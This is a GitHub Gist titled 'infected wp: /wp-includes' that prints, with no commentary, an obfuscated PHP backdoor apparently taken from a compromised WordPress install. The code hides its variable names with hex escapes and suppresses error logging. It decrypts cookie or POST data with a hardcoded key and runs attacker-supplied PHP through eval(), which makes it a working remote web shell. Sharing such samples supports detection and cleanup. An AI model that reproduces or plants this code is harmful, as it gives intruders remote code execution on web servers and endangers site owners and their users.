Skip to content

Instantly share code, notes, and snippets.

@nikitasius
Created February 16, 2017 21:15
Show Gist options
  • Save nikitasius/e3032d69a06c0b0c51f56d9a56e8eb87 to your computer and use it in GitHub Desktop.
Save nikitasius/e3032d69a06c0b0c51f56d9a56e8eb87 to your computer and use it in GitHub Desktop.
infected wp: /wp-includes
<?php ${"\x47\x4cOB\x41\x4cS"}["\x68\x76\x72\x74x\x69"]="\x61\x75th";${"\x47\x4c\x4f\x42AL\x53"}["l\x77\x75\x66fg\x64"]="\x64a\x74\x61\x5f\x6b\x65\x79";${"G\x4c\x4fBA\x4c\x53"}["\x6b\x71m\x70\x6bztv\x6a\x79"]="va\x6cu\x65";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x65mhl\x73\x79ae\x6e"]="o\x75\x74_\x64\x61\x74\x61";${"\x47L\x4f\x42\x41LS"}["\x67\x70\x72\x63\x67u\x72c\x74w"]="\x6b\x65y";${"\x47\x4cO\x42\x41\x4c\x53"}["\x61\x73\x7apkkhe\x6e\x6e"]="\x6a";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x74i\x6a\x67\x78\x79wy"]="i";${"\x47\x4c\x4fB\x41\x4c\x53"}["ib\x6c\x6e\x65\x68\x64k"]="\x64at\x61";@ini_set("er\x72\x6f\x72\x5fl\x6fg",NULL);@ini_set("log_\x65\x72r\x6f\x72s",0);@ini_set("\x6da\x78_ex\x65\x63u\x74\x69on\x5ftim\x65",0);@set_time_limit(0);if(!defined("PHP\x5f\x45O\x4c")){define("P\x48P\x5fEO\x4c","\n");}if(!defined("\x44\x49\x52\x45CTORY\x5fS\x45\x50\x41R\x41\x54OR")){define("\x44IRE\x43T\x4f\x52\x59_SEP\x41R\x41T\x4f\x52","/");}${${"G\x4cOBA\x4c\x53"}["\x69\x62ln\x65\x68d\x6b"]}=NULL;${"\x47\x4c\x4f\x42A\x4cS"}["\x73\x6fu\x73\x6bpn\x6db\x77"]="\x64a\x74a";$aysxyhokafll="d\x61\x74\x61_\x6be\x79";$yxjeetzrlad="\x64\x61ta_\x6bey";${$yxjeetzrlad}=NULL;$GLOBALS["a\x75t\x68"]="\x34\x65f\x36\x33a\x62e-1abd-45\x61\x36-\x39\x31\x33\x64-6\x66\x62\x3996\x35\x37e\x324\x62";global$auth;function sh_decrypt_phase($data,$key){$ffnnqis="da\x74\x61";$saybmtl="\x6f\x75t_\x64\x61t\x61";${$saybmtl}="";for(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x74\x69j\x67\x78\x79\x77\x79"]}=0;${${"\x47LO\x42A\x4c\x53"}["\x74\x69j\x67xy\x77\x79"]}<strlen(${$ffnnqis});){${"G\x4c\x4fB\x41LS"}["\x76xd\x76\x77\x64m\x73b"]="\x6a";${"\x47\x4cO\x42\x41\x4cS"}["\x68\x65\x6fw\x6ba\x6e"]="\x69";$shgiqyj="\x64\x61\x74a";for(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x61\x73z\x70k\x6b\x68\x65n\x6e"]}=0;${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x61\x73\x7a\x70\x6bk\x68\x65\x6e\x6e"]}<strlen(${${"\x47L\x4f\x42\x41\x4cS"}["\x67\x70r\x63\x67\x75\x72\x63\x74\x77"]})&&${${"G\x4c\x4f\x42\x41\x4cS"}["t\x69jg\x78\x79\x77\x79"]}<strlen(${$shgiqyj});${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x76\x78\x64\x76w\x64\x6ds\x62"]}++,${${"G\x4c\x4f\x42A\x4c\x53"}["h\x65ow\x6ba\x6e"]}++){${"G\x4c\x4fBAL\x53"}["\x71\x76\x74\x70\x70\x68qp\x64\x71"]="\x64a\x74\x61";${"G\x4cOB\x41\x4c\x53"}["\x76\x77iz\x71\x6c\x79\x63\x78"]="i";${${"G\x4c\x4fB\x41\x4c\x53"}["\x65m\x68\x6c\x73\x79a\x65\x6e"]}.=chr(ord(${${"\x47L\x4fB\x41\x4c\x53"}["\x71v\x74p\x70\x68qp\x64\x71"]}[${${"G\x4cO\x42A\x4cS"}["\x76\x77\x69z\x71\x6c\x79\x63\x78"]}])^ord(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["g\x70\x72c\x67\x75r\x63\x74\x77"]}[${${"G\x4cO\x42\x41\x4c\x53"}["\x61\x73zp\x6b\x6b\x68e\x6e\x6e"]}]));}}return${${"\x47L\x4fB\x41L\x53"}["\x65mh\x6cs\x79a\x65\x6e"]};}$insfkk="\x64\x61\x74\x61";function sh_decrypt($data,$key){global$auth;$vuuogtpxiqk="\x61u\x74\x68";return sh_decrypt_phase(sh_decrypt_phase(${${"\x47L\x4fBAL\x53"}["\x69b\x6c\x6e\x65h\x64\x6b"]},${$vuuogtpxiqk}),${${"G\x4cO\x42\x41\x4cS"}["\x67p\x72\x63\x67\x75\x72ct\x77"]});}foreach($_COOKIE as${${"G\x4cO\x42\x41\x4c\x53"}["g\x70rcg\x75\x72\x63\x74\x77"]}=>${${"\x47LO\x42\x41\x4c\x53"}["\x6b\x71\x6d\x70\x6b\x7a\x74v\x6ay"]}){${"\x47L\x4fBA\x4c\x53"}["k\x6a\x79v\x70\x75"]="d\x61t\x61_k\x65\x79";$zoamkqrgbfh="v\x61l\x75e";${"\x47\x4cO\x42ALS"}["jov\x64uif\x62n\x6f"]="\x64\x61\x74a";${${"G\x4cOB\x41L\x53"}["j\x6f\x76d\x75\x69f\x62\x6eo"]}=${$zoamkqrgbfh};${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6b\x6a\x79\x76\x70\x75"]}=${${"\x47\x4c\x4f\x42AL\x53"}["g\x70\x72\x63gur\x63\x74\x77"]};}if(!${${"\x47LO\x42\x41\x4c\x53"}["\x69\x62l\x6e\x65\x68dk"]}){${"\x47\x4c\x4f\x42\x41\x4cS"}["l\x6aw\x79f\x71\x7a\x6aj\x6c"]="\x76\x61l\x75e";foreach($_POST as${${"\x47\x4c\x4fB\x41\x4c\x53"}["g\x70\x72cg\x75\x72\x63\x74w"]}=>${${"\x47\x4cOBAL\x53"}["l\x6a\x77\x79\x66q\x7a\x6a\x6a\x6c"]}){$ipgrvdc="\x64\x61ta";${"\x47\x4c\x4f\x42ALS"}["\x79\x66\x75fr\x73c"]="\x76\x61l\x75e";${$ipgrvdc}=${${"G\x4cOB\x41\x4c\x53"}["\x79\x66\x75\x66r\x73c"]};${${"\x47L\x4f\x42ALS"}["\x6cw\x75\x66\x66\x67d"]}=${${"\x47L\x4fB\x41LS"}["\x67\x70r\x63\x67urc\x74w"]};}}${${"GLOB\x41\x4c\x53"}["sou\x73\x6bp\x6emb\x77"]}=@unserialize(sh_decrypt(@base64_decode(${$insfkk}),${$aysxyhokafll}));${"\x47\x4c\x4f\x42A\x4cS"}["\x70a\x79w\x68\x72\x70\x66\x76"]="\x64\x61\x74a";if(isset(${${"G\x4c\x4f\x42A\x4c\x53"}["\x70\x61\x79w\x68rp\x66\x76"]}["ak"])&&${${"\x47\x4c\x4f\x42\x41L\x53"}["h\x76\x72\x74x\x69"]}==${${"\x47\x4c\x4f\x42\x41LS"}["\x69\x62\x6cn\x65\x68\x64\x6b"]}["\x61k"]){$ydnczfxqgq="\x64\x61t\x61";if(${${"G\x4cO\x42A\x4cS"}["\x69bl\x6e\x65\x68\x64k"]}["a"]=="i"){${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x74ij\x67xy\x77\x79"]}=Array("\x70v"=>@phpversion(),"\x73\x76"=>"1.0-\x31",);echo@serialize(${${"GL\x4f\x42\x41\x4c\x53"}["\x74\x69\x6a\x67x\x79\x77\x79"]});}elseif(${$ydnczfxqgq}["a"]=="\x65"){$mwvvynwbxyi="\x64\x61\x74\x61";eval(${$mwvvynwbxyi}["\x64"]);}exit();}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment